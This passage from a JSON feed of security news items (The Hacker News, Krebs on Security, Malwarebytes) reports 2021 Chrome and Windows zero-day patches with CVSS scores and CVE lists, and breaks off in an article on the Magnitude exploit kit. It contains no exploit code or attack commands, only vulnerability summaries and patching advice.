[CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n\nChrome users are advised to update to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-01T03:30:00", "type": "thn", "title": "Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976"], "modified": "2021-10-05T05:27:09", "id": "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "href": "https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:09", "description": "[![Chrome Update](https://thehackernews.com/new-images/img/a/AVvXsEgMs77BPvPvj6P-3E7i08R8I_ixvGQZgvS5p1CxbhBqiARNzNLx3R6X1fYdCRjiQmZfLY3-6HUY_hPXAucE_jFVypFTV0HG0XIru72uSOfwfn3mMcLC9j6XyeOCF7We4fYjthQ17-YmGUSvhPWEOlnBXakT_9U8IYdpMKEB6GeCFMJI8ihho5D-6JUO=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgMs77BPvPvj6P-3E7i08R8I_ixvGQZgvS5p1CxbhBqiARNzNLx3R6X1fYdCRjiQmZfLY3-6HUY_hPXAucE_jFVypFTV0HG0XIru72uSOfwfn3mMcLC9j6XyeOCF7We4fYjthQ17-YmGUSvhPWEOlnBXakT_9U8IYdpMKEB6GeCFMJI8ihho5D-6JUO>)\n\nGoogle on Thursday rolled out an emergency update for its Chrome web browser, including fixes for two zero-day vulnerabilities that it says are being actively exploited in the wild.\n\nTracked as **CVE-2021-38000** and **CVE-2021-38003**, the weaknesses relate to insufficient validation of untrusted input in a feature called Intents as well as a case of inappropriate implementation in V8 JavaScript and WebAssembly engine. The internet giant's Threat Analysis Group (TAG) has been credited with discovering and reporting the two flaws on September 15, 2021, and October 26, 2021, respectively.\n\n\"Google is aware that exploits for CVE-2021-38000 and CVE-2021-38003 exist in the wild,\" the company [noted](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>) in an advisory without delving into technical specifics about how the two vulnerabilities were used in attacks or the threat actors that may have weaponized them.\n\nAlso addressed as part of this stable channel update is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in the Web Transport component (CVE-2021-38002), which was demonstrated for the first time at the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) contest held earlier this month in China. With these patches, Google has resolved a record 16 zero-days in the web browser since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [**CVE-2021-30632**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [**CVE-2021-30633**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [**CVE-2021-37973**](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n * [**CVE-2021-37975**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [**CVE-2021-37976**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n\nChrome users are advised to update to the latest version (95.0.4638.69) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-29T04:08:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch 2 Actively Exploited 0-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38002", "CVE-2021-38003"], "modified": "2021-10-29T04:08:52", "id": "THN:B7217784F9D53002315C9C43CCC73766", "href": "https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[![Google Chrome](https://thehackernews.com/new-images/img/a/AVvXsEibt_uA0VwMgumOtohRzrBSD-Inv5dv71ZMU1Hu4XYJFQxp8FVjEZzeLUuvttUyYx1xMxQJ16Nfw5Jdc7mPLfwoGoTeZqrLRMZ005Eu673XGL_uJrq7LDUpWojmmmN1YHSwVQcJQzL28acTco05Z7auS001HlgSR96GjvrE5gDr2M123luTRVFTFcAT=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEibt_uA0VwMgumOtohRzrBSD-Inv5dv71ZMU1Hu4XYJFQxp8FVjEZzeLUuvttUyYx1xMxQJ16Nfw5Jdc7mPLfwoGoTeZqrLRMZ005Eu673XGL_uJrq7LDUpWojmmmN1YHSwVQcJQzL28acTco05Z7auS001HlgSR96GjvrE5gDr2M123luTRVFTFcAT>)\n\nGoogle has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the [17th such weakness](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) to be disclosed since the start of the year.\n\nTracked as [CVE-2021-4102](<https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html>), the flaw relates to a [use-after-free bug](<https://cwe.mitre.org/data/definitions/416.html>) in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw.\n\nAs it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, \"it's aware of reports that an exploit for CVE-2021-4102 exists in the wild.\" This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.\n\nCVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>), also reported by an anonymous researcher, plugged in an update it shipped on September 30. It's not immediately clear if the two flaws bear any relation to one another.\n\nWith this latest update, Google has addressed a record 17 zero-days in Chrome this year alone \u2014\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals \n * [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [CVE-2021-37976](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n * [CVE-2021-38000](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Insufficient validation of untrusted input in Intents\n * [CVE-2021-38003](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Inappropriate implementation in V8\n\nChrome users are recommended to update to the latest version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T04:13:00", "type": "thn", "title": "Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102"], "modified": "2021-12-14T04:30:59", "id": "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "href": "https://thehackernews.com/2021/12/update-google-chrome-to-patch-new-zero.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-06-15T08:32:06", "description": "**Microsoft** today released another round of security updates for **Windows** operating systems and supported software, _including fixes for six zero-day bugs that malicious hackers already are exploiting in active attacks._\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nJune's Patch Tuesday addresses just 49 security holes -- about half the normal number of vulnerabilities lately. But what this month lacks in volume it makes up for in urgency: Microsoft warns that bad guys are leveraging a half-dozen of those weaknesses to break into computers in targeted attacks.\n\nAmong the zero-days are:\n\n-[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>), a remote code execution bug in a Windows HTML component. \n-[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), an information disclosure bug in the Windows Kernel \n-[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), an elevation of privilege flaw in Windows NTFS \n-[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), an elevation of privilege flaw in the Microsoft Desktop Window Manager \n-[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider \n-[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said elevation of privilege flaws are just as valuable to attackers as remote code execution bugs: Once the attacker has gained an initial foothold, he can move laterally across the network and uncover further ways to escalate to system or domain-level access.\n\n"This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools," Breen said. "The 'exploit detected' tag means attackers are actively using them, so for me, it\u2019s the most important piece of information we need to prioritize the patches."\n\nMicrosoft also patched five critical bugs -- flaws that can be remotely exploited to seize control over the targeted Windows computer without any help from users. [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) affects everything from **Windows 7** through **Windows 10** and **Server** versions **2008**,** 2012**, **2016** and **2019**.\n\n**Sharepoint** also got a critical update in [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>); Microsoft says this one is less likely to be exploited, but then critical Sharepoint flaws are a favorite target of ransomware criminals.\n\nInterestingly, two of the Windows zero-day flaws -- CVE-2021-31201 and CVE-2021-31199 -- are related to a patch **Adobe** released recently for [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), a flaw in **Adobe Acrobat** and **Reader** that also is being actively exploited.\n\n"Attackers have been seen exploiting these vulnerabilities by sending victims specially crafted PDFs, often attached in a phishing email, that when opened on the victim's machine, the attacker is able to gain arbitrary code execution," said** Christopher Hass**, director of information security and research at **Automox**. "There are no workarounds for these vulnerabilities, patching as soon as possible is highly recommended."\n\nIn addition to updating Acrobat and Reader, Adobe patched flaws in a slew of other products today, including **Adobe Connect,** **Photoshop**, and **Creative Cloud**. The full list is [here](<https://helpx.adobe.com/security.html>), with links to updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nFor a quick visual breakdown of each update released today and its severity level, check out the [this Patch Tuesday post](<https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/>) from the **SANS Internet Storm Center**.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T20:53:28", "type": "krebs", "title": "Microsoft Patches Six Zero-Day Security Holes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T20:53:28", "id": "KREBS:E374075CAB55D7AB06EBD73CB87D33CD", "href": "https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-06-15T08:32:16", "description": "This patch Tuesday harvest was another big one. The Windows updates alone included seven zero-day vulnerability updates, two of them are actively being used in the wild by a group called PuzzleMaker, four others that have also been seen in the wild, plus one other zero-day vulnerability not known to have been actively exploited. Add to that 45 vulnerabilities that were labelled important, and security updates for Android, Adobe, SAP, and Cisco. You can practically see the IT staff scrambling to figure out what to do first and what needs to be checked before applying the patches.\n\n### PuzzleMaker\n\nSecurity researchers have discovered a new threat actor dubbed [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), that was found using a chain of Google Chrome and Windows 10 zero-day exploits in highly targeted attacks against multiple companies worldwide. Unfortunately the researchers were unable to conclusively identify the Chrome vulnerability that was used (but they do have a suspect). The good news is that the two Windows vulnerabilities in the attack chain were included in the Windows 10 KB5003637 & KB5003635 cumulative updates. These vulnerabilities are listed as [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), a Windows kernel information disclosure vulnerability, and [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>), a Windows NTFS elevation of privilege vulnerability.\n\n### Other critical issues\n\nThe other critical patches made available by Microsoft this June include these actively exploited vulnerabilities:\n\n * [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), a Microsoft DWM Core Library Elevation of Privilege Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n * [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>) Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n * [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>) another Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n\nNot (yet) actively exploited zero day vulnerability:\n\n * [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) Windows Remote Desktop Services Denial of Service Vulnerability.\n\nOther critical updates:\n\n * [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) Microsoft SharePoint Server Remote Code Execution Vulnerability.\n * [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) Scripting Engine Memory Corruption Vulnerability.\n * [CVE-2021-31967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31967>) VP9 Video Extensions Remote Code Execution Vulnerability.\n * [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985>) Microsoft Defender Remote Code Execution Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n\n### Android\n\nThe [Android Security Bulletin of June 7](<https://source.android.com/security/bulletin/2021-06-01>) mentions a critical security vulnerability in the System component that "could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process", which is as bad as it sounds. That vulnerability, listed as [CVE-2021-0507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-0507>), could allow an attacker to take control of a targeted Android device unless it's patched.\n\n### Cisco\n\nCisco has issued a [patch](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-ssl-decrypt-dos-DdyLuK6c>) for a vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software, that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message **through** an affected device. SSL/TLS messages sent **to** an affected device do not trigger this vulnerability. Cisco informs us that there is no workaround for this issue. Patching is the only solution.\n\n### SAP\n\nIn the SAP advisory for [Security Patch Day \u2013 June 2021](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) we can find two issues that are labelled as \u201cHot News\u201d:\n\n * [CVE-2021-276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>)[2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>) SAP Commerce, versions - 1808, 1811, 1905, 2005, 2011, Backoffice application allows certain authorized users to create source rules which are translated to drools rule when published to certain modules within the application. An attacker with this authorization can inject malicious code in the source rules and perform remote code execution enabling them to compromise the confidentiality, integrity and availability of the application.\n * [CVE-2021-27610](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27610>) Improper Authentication in SAP NetWeaver ABAP Server and ABAP Platform.\n\n### Adobe\n\nTo top things off, Adobe has released a giant [Patch ](<https://helpx.adobe.com/security.html>)[Tuesday security update](<https://helpx.adobe.com/security.html>) release that fixes vulnerabilities in ten applications, including Adobe Acrobat (of course), Reader, and Photoshop. Notably five vulnerabilities in Adobe Acrobat and Reader were fixed that address multiple critical vulnerabilities. Acrobat's determination to cement its place as [the new Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) shows no sign of dimming.\n\nSuccessful exploitation could lead to arbitrary code execution in the context of the current user on both Windows and macOS. The same is true for two critical vulnerabilities in Photoshop that could lead to arbitrary code execution in the context of the current user.\n\n### CVE\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Which is why we try and link you to the Mitre list of CVE\u2019s where possible. It allows interested parties to find and compare vulnerabilities.\n\nHappy patching, everyone!\n\nThe post [Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-09T14:50:52", "type": "malwarebytes", "title": "Microsoft fixes seven zero-days, including two PuzzleMaker targets, Google fixes serious Android flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0507", "CVE-2021-27602", "CVE-2021-27610", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T14:50:52", "id": "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-21T14:41:47", "description": "Exploit kits (EK) are not as widespread as they used to be. One of the reasons is likely that most exploit kits targeted software that is hardly ever used anymore. Internet Explorer, Silverlight, and Flash Player to name a few, have been deprecated, replaced, and quickly lost their user-base.\n\nSo, just when you start thinking there is one less threat to worry much about, researchers have found an exploit kit with a keen interest in Chrome. Which, from a business point of view, makes a lot of sense, since Chrome is close to becoming not just a market leader, but almost a monopolist in the browser market.\n\nChrome has, at the time of writing, a market share of around 65%. The only other browser that reaches a market share that is over 10% is Safari. So if you are in the business of compromising browsers that visit your website or watch your advertisement, having Chrome users on your target list is a big plus.\n\nOr, as Malwarebytes' Director of Threat Intelligence, J\u00e9r\u00f4me Segura, put it:\n\n> "The future of exploit kits is via Chrome exploits. This could either be an anomaly or the beginning of a new era with big implications for the years to come."\n\n### Magnitude EK\n\nEnter the Magnitude exploit kit. [Researchers](<https://twitter.com/AvastThreatLabs/status/1450476708939767815>) have found that the Magnitude EK is actively using two vulnerabilities to exploit Chromium-based browsers. Magnitude is used in malvertising attacks to infect victims who visit 